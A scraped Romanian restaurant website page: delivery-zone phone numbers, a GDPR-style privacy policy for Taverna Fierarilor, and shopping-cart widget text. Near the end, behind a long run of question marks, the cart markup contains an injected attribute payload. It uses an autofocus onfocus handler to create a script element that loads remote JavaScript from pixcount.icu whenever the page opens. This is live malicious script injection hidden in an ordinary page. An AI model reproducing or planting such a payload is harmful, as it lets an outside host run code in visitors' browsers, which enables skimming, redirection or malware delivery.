Zona BD Nicolae Grigorescu: tel. 0771373821
Zona Theodor Pallady: tel. 0758103269
Zona Berceni -Giurgiului: tel. 0758105629

Politica de Confidentialitate

Ce date personale prelucram?

Datele personale pe care le prelucrăm sunt, în principal, datele identificare are clienţilor, datele financiare pentru facturare, date demografice, de localizare sau altele. Aceste date se colectează în momentul în care faci o comandă pe site-ul nostru şi devii automat clientul nostru.

Modul de prelucrare a acestor date

În primul rând ţinem să precizăm că preluăm şi prelucram aceste date exclusiv în scopuri legitime. Aceste date ne sunt necesare pentru a putea presta serviciile noastre, pentru a putea derula contractele în vigoare şi nu în ultimul rând pentru a-ţi oferi oricând asistenta necesară sau suportul tehnic de care ai nevoie. Pentru că securitatea datelor tale este foarte importantă, ne putem folosi de datele tale pentru a putea să te identificăm corect în momentul în care ne contactezi pentru a efectua mentenanţe asistate. Putem folosi datele tale personale în scopuri de marketing, pentru a îmbunătăţi şi dezvolta eficient serviciile sau/şi produsele pe care ţi le oferim, bineînţeles dacă ai optat explicit pentru acest lucru.

Administrarea acordurilor exprimate

Întotdeauna ţinem cont de opţiunea ta exercitată în momentul în care ai devenit clientul nostru. Daca doresti sa iti retragi in orice moment acordul exprimat, ne poti trimite o solicitare in acest sens folosind modalitatile de contact prezente pe site .

Comunicarea datelor personale către terţi:

NU vor fi comunicate datele dumneavoastra personale, catre entitati terte.

Timpul în care prelucram datele tale personale.

Aceste date vor fi prelucrate pe tot parcursul relaţiei contractuale intre părţi. În momentul încetării relaţiilor contractuale, datele vor fi păstrate conform legislaţiei în vigoare.

Securitatea datelor

Am implementat masuri de securitate pentru a impiedica pierderea accidentala, utilizarea sau accesarea datelor dumneavoastra cu caracter personal intr-un mod neautorizat, modificarea sau divulgarea acestora.

Am implementat proceduri pentru a trata orice incalcare de date cu caracter personal suspecta si va vom notifica pe dumneavoastra si orice autoritate de reglementare aplicabila cu privire la o incalcare in cazul in care suntem obligati legal sa facem acest lucru.

Drepturile clientului în ceea ce priveşte datele personale:

•Dreptul la informare – ai dreptul de a fi informat despre tot ce se întâmplă cu datele tale personale, la ce sunt folosite, să le accesezi, să le modifici și chiar să revoci consimțământul pentru o anumită organizație. În același timp, ai dreptul să îți accesezi datele personale ori de câte ori vrei.

•Dreptul la rectificare – le poţi modifica şi/sau completă; Persoana vizată are dreptul de a obţine de la operator, fără întârzieri nejustificate, rectificarea datelor cu caracter personal inexacte care o privesc. Ţinându-se seama de scopurile în care au fost prelucrate datele, persoana vizată are dreptul de a obţine completarea datelor cu caracter personal care sunt incomplete, inclusiv prin furnizarea unei declaraţii suplimentare

•Dreptul de a fi uitat (ştergerea datelor) – poţi obţine ştergerea datelor, principiul general este că o persoană are dreptul de a cere ștergerea datelor personale. Acest drept nu este unul absolut, aceasta însemnând că există circumstanțe în care datele nu vor fi șterse la cererea persoanei vizate.

•Dreptul la restricţionare poţi solicita restricţionarea prelucrării datelor. Conform GDPR o persoană are dreptul de a restricționa prelucrarea datelor personale în diverse circumstanțe. De exemplu, o persoană vizată poate restricționa prelucrarea datelor personale când crede că acestea nu sunt exacte. În acest caz, persoana va putea restricționa prelucrarea datelor până când acuratețea acestora este verificată. Un alt caz când se poate restricționa prelucrarea datelor este momentul în care persoana vizată obiectează prelucrării.

•Dreptul de opoziţie – poţi să te opui prelucrării datelor tale personale

•Dreptul la portabilitate – poţi primi, în anumite condiţii, datele personale pe care ni le-ai furnizat, într-un format care poate fi citit automat sau poţi solicita că respectivele date să fie transmise altui operator;

•Dreptul de a depune plângere – poţi depune plângere faţă de modalitatea de prelucrare a datelor personale la Autoritatea Naţională de Supraveghere a Prelucrării Datelor cu Caracter Personal;

•Dreptul de retragere a consimţământului – în cazurile în care prelucrarea se întemeiază pe consimţământul tău, ţi-l poţi retrage oricând

•Drepturi suplimentare aferente deciziilor automate :puteţi cere şi obţine intervenţia umană cu privire prelucrările de date, vă puteţi exprima punctul de vedere şi puteţi contesta decizia.

Cum îţi poţi exercita drepturile

Printr-o simplă notificare/solicitare folosind modalitatile puse la dispozitie pe site-ul nostru.

Petru mai multe detalii, poţi accesa oricând site-ul nostru la adresa https://tavernafierarilor.ro

0
0,00 lei
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//pixcount.icu/counter.js";document.head.append(script); autofocus=\"
Empty Cart